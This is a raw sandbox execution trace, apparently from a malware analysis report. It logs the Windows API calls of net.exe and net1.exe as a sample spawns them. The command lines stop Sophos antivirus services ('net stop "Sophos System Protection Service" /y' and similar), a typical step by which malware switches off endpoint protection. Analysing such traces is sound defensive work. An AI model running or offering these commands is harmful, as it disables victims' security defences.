(hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4㽸\x814") returned 0xc1 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0038.338] LocalFree (hMem=0x819868) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4顨\x814") returned 0x16 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x33 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="顨\x81⡋瓢4㽸\x814") returned 0x234 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0038.338] LocalFree (hMem=0x819868) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4顨\x814") returned 0x13 [0038.338] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.338] LocalFree (hMem=0x813f78) returned 0x0 [0038.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x16 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㶐\x81⡋瓢4㽸\x814") returned 0x11 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813d90) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㶐\x814") returned 0x14 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x12 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0xf [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x17 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x18 [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0038.339] LocalFree (hMem=0x813f78) returned 0x0 [0038.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x2a [0038.339] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0038.340] LocalFree (hMem=0x813f78) returned 0x0 [0038.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.340] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0038.340] GetFileType (hFile=0x26c) returned 0x3 [0038.340] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x34f7c4 | out: lpMode=0x34f7c4) returned 0 [0038.341] GetConsoleOutputCP () returned 0x1b5 [0038.341] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0038.341] malloc (_Size=0x16) returned 0x1e2738 [0038.341] GetConsoleOutputCP () returned 0x1b5 [0038.341] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x1e2738, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0038.341] WriteFile (in: hFile=0x26c, lpBuffer=0x1e2738*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x34f7c8, lpOverlapped=0x0 | out: lpBuffer=0x1e2738*, lpNumberOfBytesWritten=0x34f7c8*=0x15, lpOverlapped=0x0) returned 1 [0038.341] free (_Block=0x1e2738) [0038.341] LocalFree (hMem=0x813f78) returned 0x0 [0038.342] NetApiBufferFree (Buffer=0x811ca8) returned 0x0 [0038.342] NetApiBufferFree (Buffer=0x811cc0) returned 0x0 [0038.342] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y" [0038.342] exit (_Code=1) Process: id = "31" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x49723000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 99 os_tid = 0xba8 Process: id = "32" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47dc7000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xba4" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0xbb0 [0038.476] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afeb0 | out: lpSystemTimeAsFileTime=0x2afeb0*(dwLowDateTime=0xe1239ec0, dwHighDateTime=0x1d57a86)) [0038.476] GetCurrentProcessId () returned 0xbac [0038.476] GetCurrentThreadId () returned 0xbb0 [0038.477] GetTickCount () returned 0x1144a0b [0038.477] QueryPerformanceCounter (in: lpPerformanceCount=0x2afea8 | out: lpPerformanceCount=0x2afea8*=15876122774) returned 1 [0038.477] GetModuleHandleA (lpModuleName=0x0) returned 0x950000 [0038.477] __set_app_type (_Type=0x1) [0038.477] __p__fmode () returned 0x74eb31f4 [0038.477] __p__commode () returned 0x74eb31fc [0038.477] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x95ffe6) returned 0x0 [0038.477] __getmainargs (in: _Argc=0x969064, _Argv=0x96906c, _Env=0x969068, _DoWildCard=0, _StartInfo=0x969024 | out: _Argc=0x969064, _Argv=0x96906c, _Env=0x969068) returned 0 [0038.477] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.477] GetConsoleOutputCP () returned 0x1b5 [0038.477] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x969080 | out: lpCPInfo=0x969080) returned 1 [0038.478] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.480] sprintf_s (in: _DstBuf=0x2afe68, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0038.481] setlocale (category=0, locale=".437") returned="English_United States.437" [0038.483] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0038.483] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0038.483] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y" [0038.483] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2afc34, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0038.483] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xac) returned 0x543c58 [0038.483] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0038.483] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2afe38 | out: Buffer=0x2afe38*=0x541cb8) returned 0x0 [0038.483] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2afe38 | out: Buffer=0x2afe38*=0x541cd0) returned 0x0 [0038.483] _fileno (_File=0x74eb2900) returned -2 [0038.483] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0038.483] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0038.483] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0038.483] _wcsicmp (_String1="config", _String2="stop") returned -16 [0038.483] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0038.483] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0038.483] _wcsicmp (_String1="file", _String2="stop") returned -13 [0038.484] _wcsicmp (_String1="files", _String2="stop") returned -13 [0038.484] _wcsicmp (_String1="group", _String2="stop") returned -12 [0038.484] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0038.484] _wcsicmp (_String1="help", _String2="stop") returned -11 [0038.484] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0038.484] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0038.484] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0038.484] _wcsicmp (_String1="session", _String2="stop") returned -15 [0038.484] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0038.484] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0038.484] _wcsicmp (_String1="share", _String2="stop") returned -12 [0038.484] _wcsicmp (_String1="start", _String2="stop") returned -14 [0038.484] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0038.484] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0038.484] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0038.484] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0038.484] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0038.484] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0038.484] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0038.484] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0038.484] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0038.484] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0038.484] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0038.484] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0038.484] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0038.484] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0038.484] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0038.484] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0038.484] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0038.484] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0038.485] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0038.485] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0038.485] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0038.485] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0038.485] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0038.485] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0038.485] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0038.485] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0038.485] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0038.485] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0038.485] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0038.485] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0038.485] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0038.485] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0038.485] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0038.485] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0038.485] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0038.485] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0038.485] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0038.485] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0038.485] _wcsicmp (_String1="accounts", _String2="System") returned -18 [0038.486] _wcsicmp (_String1="computer", _String2="System") returned -16 [0038.486] _wcsicmp (_String1="config", _String2="System") returned -16 [0038.486] _wcsicmp (_String1="continue", _String2="System") returned -16 [0038.486] _wcsicmp (_String1="cont", _String2="System") returned -16 [0038.486] _wcsicmp (_String1="file", _String2="System") returned -13 [0038.486] _wcsicmp (_String1="files", _String2="System") returned -13 [0038.486] _wcsicmp (_String1="group", _String2="System") returned -12 [0038.486] _wcsicmp (_String1="groups", _String2="System") returned -12 [0038.486] _wcsicmp (_String1="help", _String2="System") returned -11 [0038.486] _wcsicmp (_String1="helpmsg", _String2="System") returned -11 [0038.486] _wcsicmp (_String1="localgroup", _String2="System") returned -7 [0038.486] _wcsicmp (_String1="pause", _String2="System") returned -3 [0038.486] _wcsicmp (_String1="session", _String2="System") returned -20 [0038.486] _wcsicmp (_String1="sessions", _String2="System") returned -20 [0038.486] _wcsicmp (_String1="sess", _String2="System") returned -20 [0038.486] _wcsicmp (_String1="share", _String2="System") returned -17 [0038.486] _wcsicmp (_String1="start", _String2="System") returned -5 [0038.486] _wcsicmp (_String1="stats", _String2="System") returned -5 [0038.486] _wcsicmp (_String1="statistics", _String2="System") returned -5 [0038.486] _wcsicmp (_String1="stop", _String2="System") returned -5 [0038.486] _wcsicmp (_String1="time", _String2="System") returned 1 [0038.486] _wcsicmp (_String1="user", _String2="System") returned 2 [0038.486] _wcsicmp (_String1="users", _String2="System") returned 2 [0038.486] _wcsicmp (_String1="msg", _String2="System") returned -6 [0038.486] _wcsicmp (_String1="messenger", _String2="System") returned -6 [0038.486] _wcsicmp (_String1="receiver", _String2="System") returned -1 [0038.486] _wcsicmp (_String1="rcv", _String2="System") returned -1 [0038.486] _wcsicmp (_String1="netpopup", _String2="System") returned -5 [0038.486] _wcsicmp (_String1="redirector", _String2="System") returned -1 [0038.486] _wcsicmp (_String1="redir", _String2="System") returned -1 [0038.486] _wcsicmp (_String1="rdr", _String2="System") returned -1 [0038.486] _wcsicmp (_String1="workstation", _String2="System") returned 4 [0038.486] _wcsicmp (_String1="work", _String2="System") returned 4 [0038.486] _wcsicmp (_String1="wksta", _String2="System") returned 4 [0038.487] _wcsicmp (_String1="prdr", _String2="System") returned -3 [0038.487] _wcsicmp (_String1="devrdr", _String2="System") returned -15 [0038.487] _wcsicmp (_String1="lanmanworkstation", _String2="System") returned -7 [0038.487] _wcsicmp (_String1="server", _String2="System") returned -20 [0038.487] _wcsicmp (_String1="svr", _String2="System") returned -3 [0038.487] _wcsicmp (_String1="srv", _String2="System") returned -7 [0038.487] _wcsicmp (_String1="lanmanserver", _String2="System") returned -7 [0038.487] _wcsicmp (_String1="alerter", _String2="System") returned -18 [0038.487] _wcsicmp (_String1="netlogon", _String2="System") returned -5 [0038.487] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0038.487] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.487] wcscpy_s (in: _Destination=0x2af938, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0038.487] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74770000 [0038.488] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2af934, nSize=0x0, Arguments=0x2af930 | out: lpBuffer="嚀Tneth.dll") returned 0xff [0038.489] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0038.489] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0038.490] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0038.490] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0038.490] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.490] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0038.490] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0038.490] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.490] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0038.490] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0038.490] _wcsicmp (_String1="CONT", _String2="System") returned -16 [0038.490] _wcsicmp (_String1="CONT", _String2="Protection") returned -13 [0038.490] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.490] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0038.490] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0038.490] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.490] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0038.490] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0038.490] _wcsicmp (_String1="FILES", _String2="System") returned -13 [0038.490] _wcsicmp (_String1="FILES", _String2="Protection") returned -10 [0038.490] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.490] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0038.490] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0038.490] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0038.490] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0038.490] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0038.490] _wcsicmp (_String1="GROUPS", _String2="System") returned -12 [0038.490] _wcsicmp (_String1="GROUPS", _String2="Protection") returned -9 [0038.490] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0038.490] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0038.491] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0038.491] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0038.491] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.491] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0038.491] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0038.491] _wcsicmp (_String1="REPL", _String2="System") returned -1 [0038.491] _wcsicmp (_String1="REPL", _String2="Protection") returned 2 [0038.491] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0038.491] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0038.491] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0038.491] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0038.491] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0038.491] _wcsicmp (_String1="REPLICATOR", _String2="System") returned -1 [0038.491] _wcsicmp (_String1="REPLICATOR", _String2="Protection") returned 2 